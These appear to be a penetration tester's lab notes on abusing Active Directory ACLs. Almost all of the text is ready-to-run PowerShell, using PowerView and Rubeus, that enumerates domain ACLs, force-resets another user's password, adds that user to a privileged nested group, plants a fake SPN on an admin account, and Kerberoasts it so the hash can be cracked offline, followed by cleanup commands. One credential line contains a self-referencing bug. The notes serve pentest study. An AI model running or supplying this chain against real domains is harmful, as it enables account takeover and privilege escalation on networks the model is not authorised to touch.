Get-Acl and Get-ADUser<aside>
Creating a list of Domain Users
Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
Read each line of the file and retrieve ACL information for each domain user and select just the Access property .
foreach($line in [System.IO.File]::ReadLines("C:\\Users\\Wook\\Desktop\\ad_users.txt")) {get-acl "AD:\\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'DOMAIN\\\\[user]'}}
See if a group is nested into any other groups because nested group memberships mean that any users in group A will inherit all rights of any group that group A is nested into.
Get-DomainGroup -Identity [Group] | select memberof
</aside>
<aside>
Import-Module .\\PowerView.ps1
$sid = Convert-NameToSid [username]
Get-DomainObjectACL -ResolveGUIDs -Identify * | ? {$_.SecurityIdentifier -eq $sid}
Get-DomainObjectACL -ResolveGUIDs -Identify * | ? {$_.SecurityIdentifier -eq $sid} -Verbose
</aside>
<aside>
wook user to change the password for the leon userleon user and leverage GenericWrite rights to add a user that we control to the Help Desk Level 1 groupInformation Technology group and leverage GenericAll rights to take control of the levi userSo first, we must authenticate as wook and force change the password of the user leon
Authenticating as wook. We could skip this step if we were already running as the user.
$wookPassword = ConvertTo-SecureString '[password]' -AsPlainText -Force
$wookCred = New-Object System.Management.Automation.PSCredential('HARI\\wook',$wookPassword)
This represents the password we want to set for the target user
$leonPassword = ConvertTo-SecureString 'LeonPassword123' -AsPlainText -Force
Import-Module .\\PowerView.ps1
Set-DomainUserPassword -Identity leon -AccountPassword $leonPassword -Credential $wookCred -Verbose
Now we authenticate as the leon user and add ourselves to the Help Desk Level 1 group.
$leonPassword = ConvertTo-SecureString 'LeonPassword123' -AsPlainText -Force
$leonCred = New-Object System.Management.Automation.PSCredential('HARI\\leon',$leonCred)
Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members
Add-DomainGroupMember -Identity "Help Desk Level 1" -Members 'leon' -Credential $leonCred -Verbose
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
At this point, we should be able to leverage our new group membership to take control over the levi user. Now, let’s say that our client permitted us to change the password of the leon user, but the levi user is an admin account that cannot be interrupted. Since we have GenericAll rights all over this account, we can have perform a targeted Kerberoasting attack by modifying the account’s servicePrincipalName attribute to create a fake SPN that we can then Kerberoast to obtain the TGS ticket and crack the hash offline.
We must be authenticated as a member of the Information Technology group for this to be successful. Since we added leon to the Help Desk Level 1 group, we inherited rights via nested group membership. We can now use Set-DomainObject to create the fake SPN. We could use the tool targetedKerberoast to perform this same attack from a Linux host, and it will create a temporary SPN, retrieve the hash, and delete the temporary SPN all in one command.
Set-DomainObject -Credential $leonCred -Identity levi -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
If this worked, we should be able to Kerberoast the user using any number of methods to obtain the hash
.\\Rubeus.exe kerberoast /user:levi /nowrap
</aside>
<aside>
Set-DomainObject -Credential $leonCred -Identity levi -Clear serviceprincipalname -Verbose
Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'leon' -Credential $leonCred -Verbose
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName |? {$_.MemberName -eq 'leon'} -Verbose
</aside>